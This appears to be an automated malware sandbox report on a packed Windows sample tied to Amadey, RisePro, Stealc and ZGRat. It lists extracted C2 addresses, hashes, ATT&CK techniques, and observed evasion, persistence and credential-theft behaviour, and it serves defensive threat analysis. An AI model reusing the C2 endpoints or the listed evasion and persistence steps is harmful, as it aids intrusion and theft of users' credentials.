amadey | ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926

Analysis

max time kernel
117s
max time network
152s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
08-05-2024 13:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
Size

1.7MB
MD5

6bcab686349807f131a92c8fe7a4d736
SHA1

487846c6d51f8df894bb174542a81fd0eb25e1ae
SHA256

ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926
SHA512

94e16b6336a1205cf624f8fcdbb2e32a2e85be93a483d87369e3cd85b12a31f31a908c730709f40a91d0ae6a173554c66229bb44d4ac2295c29073741ce9014a
SSDEEP

49152:haJmLsU7YRCWfNHICNUMjSd2HZmSTI3G/kPdLmas2:haJksZyCiMnk2cVq4

Score

10^/10

amadey privateloader risepro stealc zgrat discovery evasion execution loader persistence rat spyware stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://193.233.132.139

Attributes

install_dir
5454e6f062
install_file
explorta.exe
strings_key
c7a869c5ba1d72480093ec207994e2bf
url_paths
/sev56rkm/index.php

rc4.plain

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

stealc

http://49.13.229.86

Attributes

url_path
/c73eed764cc59dcb.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral1/memory/3028-814-0x00000000010F0000-0x0000000004924000-memory.dmp	family_zgrat_v1
behavioral1/memory/3028-833-0x000000001EE30000-0x000000001EF3A000-memory.dmp	family_zgrat_v1
behavioral1/memory/3028-853-0x000000001E3B0000-0x000000001E3D4000-memory.dmp	family_zgrat_v1

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	lZ6dox2jcJjO2ctdJOuUvq5Z.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1ac05abff4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	lZ6dox2jcJjO2ctdJOuUvq5Z.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
3320	bcdedit.exe
2672	bcdedit.exe
3200	bcdedit.exe
3168	bcdedit.exe
3348	bcdedit.exe
3516	bcdedit.exe
3604	bcdedit.exe
3600	bcdedit.exe
3596	bcdedit.exe
928	bcdedit.exe
3792	bcdedit.exe
3712	bcdedit.exe
3872	bcdedit.exe
4012	bcdedit.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
10	2192	rundll32.exe
20	1596	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
952	powershell.exe
3800	powershell.EXE
1252	powershell.exe
2484	powershell.exe
1220	powershell.exe
4032	powershell.exe
2096	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3876	netsh.exe
3692	netsh.exe
3764	netsh.exe
3788	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1ac05abff4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	lZ6dox2jcJjO2ctdJOuUvq5Z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1ac05abff4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	lZ6dox2jcJjO2ctdJOuUvq5Z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\arK7XA7B9wKp1xfjwzmHYENG.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hzrt8aEWdEyk8uJQJIGESOjN.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F9WKand0JeZA81PvPMwhMdm6.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tJhVDkkO2foQeVc5PzBqF3QF.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RP1zMY0IFAll0wR8f1RtNAg8.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NwI1hPtfVWYDI3zqjCyMAiya.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SVDwxep5dghbabpwa3QKMlK2.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2DEv5P4hKkPsYAa7wE5NjXTw.bat	AddInProcess32.exe

Executes dropped EXE 23 IoCs

pid	Process
2568	explorta.exe
2164	amert.exe
2168	explorha.exe
1480	swiiiii.exe
332	1ac05abff4.exe
1992	7ce0dca0aa.exe
2928	swiy.exe
2372	file300un.exe
2920	gold.exe
2060	JxBN2snBiweR9ixOLEKrqfiC.exe
3052	CY5T4gZnO8FCA3CHrIx5uMPb.exe
1848	1fUuDRWF6FrLKriwzPr1PsaU.exe
2160	p0Rj0PxxnScZGjcm90ZBVb8w.exe
2664	EGsqYBq0r3SiGvoekVdQOiuW.exe
2864	lZ6dox2jcJjO2ctdJOuUvq5Z.exe
1600	XM06E6FTYRIil71dCUnwtZHB.exe
2008	Install.exe
3076	EGsqYBq0r3SiGvoekVdQOiuW.exe
1048	CY5T4gZnO8FCA3CHrIx5uMPb.exe
3084	JxBN2snBiweR9ixOLEKrqfiC.exe
3092	1fUuDRWF6FrLKriwzPr1PsaU.exe
3188	u1o0.0.exe
3480	alexxxxxxxx.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Wine	explorha.exe

Loads dropped DLL 63 IoCs

pid	Process
1048	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
2568	explorta.exe
2568	explorta.exe
2164	amert.exe
2168	explorha.exe
880	WerFault.exe
880	WerFault.exe
880	WerFault.exe
880	WerFault.exe
880	WerFault.exe
2568	explorta.exe
784	rundll32.exe
784	rundll32.exe
784	rundll32.exe
784	rundll32.exe
2192	rundll32.exe
2192	rundll32.exe
2192	rundll32.exe
2192	rundll32.exe
2568	explorta.exe
1596	rundll32.exe
1596	rundll32.exe
1596	rundll32.exe
1596	rundll32.exe
2168	explorha.exe
2168	explorha.exe
1620	WerFault.exe
1620	WerFault.exe
1620	WerFault.exe
1620	WerFault.exe
2168	explorha.exe
2168	explorha.exe
1620	WerFault.exe
2520	AddInProcess32.exe
2520	AddInProcess32.exe
2520	AddInProcess32.exe
2520	AddInProcess32.exe
2520	AddInProcess32.exe
2520	AddInProcess32.exe
2520	AddInProcess32.exe
2520	AddInProcess32.exe
2520	AddInProcess32.exe
2520	AddInProcess32.exe
2520	AddInProcess32.exe
1600	XM06E6FTYRIil71dCUnwtZHB.exe
1600	XM06E6FTYRIil71dCUnwtZHB.exe
1600	XM06E6FTYRIil71dCUnwtZHB.exe
2980	RegAsm.exe
2980	RegAsm.exe
1600	XM06E6FTYRIil71dCUnwtZHB.exe
2008	Install.exe
2008	Install.exe
2008	Install.exe
2160	p0Rj0PxxnScZGjcm90ZBVb8w.exe
2160	p0Rj0PxxnScZGjcm90ZBVb8w.exe
2160	p0Rj0PxxnScZGjcm90ZBVb8w.exe
2160	p0Rj0PxxnScZGjcm90ZBVb8w.exe
2168	explorha.exe
2168	explorha.exe
3508	WerFault.exe
3508	WerFault.exe
3508	WerFault.exe
3508	WerFault.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 37 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/1048-1-0x0000000000A90000-0x0000000000FDF000-memory.dmp	themida
behavioral1/memory/1048-2-0x0000000000A90000-0x0000000000FDF000-memory.dmp	themida
behavioral1/memory/1048-3-0x0000000000A90000-0x0000000000FDF000-memory.dmp	themida
behavioral1/memory/1048-0-0x0000000000A90000-0x0000000000FDF000-memory.dmp	themida
behavioral1/memory/1048-6-0x0000000000A90000-0x0000000000FDF000-memory.dmp	themida
behavioral1/memory/1048-7-0x0000000000A90000-0x0000000000FDF000-memory.dmp	themida
behavioral1/memory/1048-5-0x0000000000A90000-0x0000000000FDF000-memory.dmp	themida
behavioral1/memory/1048-4-0x0000000000A90000-0x0000000000FDF000-memory.dmp	themida
behavioral1/memory/1048-8-0x0000000000A90000-0x0000000000FDF000-memory.dmp	themida
behavioral1/files/0x000800000001564f-18.dat	themida
behavioral1/memory/2568-27-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/2568-28-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/2568-25-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/2568-24-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/2568-22-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/2568-26-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/2568-23-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/2568-29-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/2568-21-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/1048-20-0x0000000000A90000-0x0000000000FDF000-memory.dmp	themida
behavioral1/memory/2568-31-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/2568-67-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/files/0x0006000000015d87-110.dat	themida
behavioral1/memory/2568-119-0x0000000004560000-0x0000000004BF3000-memory.dmp	themida
behavioral1/memory/332-120-0x00000000001E0000-0x0000000000873000-memory.dmp	themida
behavioral1/memory/332-121-0x00000000001E0000-0x0000000000873000-memory.dmp	themida
behavioral1/memory/332-123-0x00000000001E0000-0x0000000000873000-memory.dmp	themida
behavioral1/memory/332-122-0x00000000001E0000-0x0000000000873000-memory.dmp	themida
behavioral1/memory/332-124-0x00000000001E0000-0x0000000000873000-memory.dmp	themida
behavioral1/memory/332-125-0x00000000001E0000-0x0000000000873000-memory.dmp	themida
behavioral1/memory/332-127-0x00000000001E0000-0x0000000000873000-memory.dmp	themida
behavioral1/memory/332-126-0x00000000001E0000-0x0000000000873000-memory.dmp	themida
behavioral1/memory/332-128-0x00000000001E0000-0x0000000000873000-memory.dmp	themida
behavioral1/memory/2568-165-0x0000000000160000-0x00000000006AF000-memory.dmp	themida
behavioral1/memory/332-205-0x00000000001E0000-0x0000000000873000-memory.dmp	themida
behavioral1/memory/2864-597-0x0000000140000000-0x00000001408F4000-memory.dmp	themida
behavioral1/memory/2864-893-0x0000000140000000-0x00000001408F4000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\1ac05abff4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\1ac05abff4.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\7ce0dca0aa.exe = "C:\\Users\\Admin\\1000021002\\7ce0dca0aa.exe"	explorta.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1ac05abff4.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lZ6dox2jcJjO2ctdJOuUvq5Z.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
54	pastebin.com
56	pastebin.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
91	api.myip.com
93	api.myip.com
94	api.myip.com
101	ipinfo.io
102	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0006000000016c64-154.dat	autoit_exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	lZ6dox2jcJjO2ctdJOuUvq5Z.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	lZ6dox2jcJjO2ctdJOuUvq5Z.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	lZ6dox2jcJjO2ctdJOuUvq5Z.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	lZ6dox2jcJjO2ctdJOuUvq5Z.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2164	amert.exe
2168	explorha.exe
2864	lZ6dox2jcJjO2ctdJOuUvq5Z.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1480 set thread context of 2360	1480	swiiiii.exe	38
PID 2928 set thread context of 2980	2928	swiy.exe	65
PID 2372 set thread context of 2520	2372	file300un.exe	71

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorta.job	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
File created	C:\Windows\Tasks\explorha.job	amert.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3972	sc.exe
1776	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
3040	2360	WerFault.exe	38
880	1480	WerFault.exe	36
3508	3480	WerFault.exe	109

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
768	schtasks.exe
3712	schtasks.exe
3588	schtasks.exe
1644	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	JxBN2snBiweR9ixOLEKrqfiC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	JxBN2snBiweR9ixOLEKrqfiC.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2164	amert.exe
2168	explorha.exe
2192	rundll32.exe
2192	rundll32.exe
2192	rundll32.exe
2192	rundll32.exe
2192	rundll32.exe
2228	chrome.exe
2228	chrome.exe
2980	RegAsm.exe
952	powershell.exe
2980	RegAsm.exe
2484	powershell.exe
1848	1fUuDRWF6FrLKriwzPr1PsaU.exe
1848	1fUuDRWF6FrLKriwzPr1PsaU.exe
2664	EGsqYBq0r3SiGvoekVdQOiuW.exe
2664	EGsqYBq0r3SiGvoekVdQOiuW.exe
3052	CY5T4gZnO8FCA3CHrIx5uMPb.exe
3052	CY5T4gZnO8FCA3CHrIx5uMPb.exe
2060	JxBN2snBiweR9ixOLEKrqfiC.exe
2060	JxBN2snBiweR9ixOLEKrqfiC.exe
2484	powershell.exe
2484	powershell.exe
2484	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe
Token: SeShutdownPrivilege	2228	chrome.exe

Suspicious use of FindShellTrayWindow 49 IoCs

pid	Process
1048	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
2164	amert.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
2228	chrome.exe
2228	chrome.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe

Suspicious use of SendNotifyMessage 43 IoCs

pid	Process
1992	7ce0dca0aa.exe
1992	7ce0dca0aa.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
2228	chrome.exe
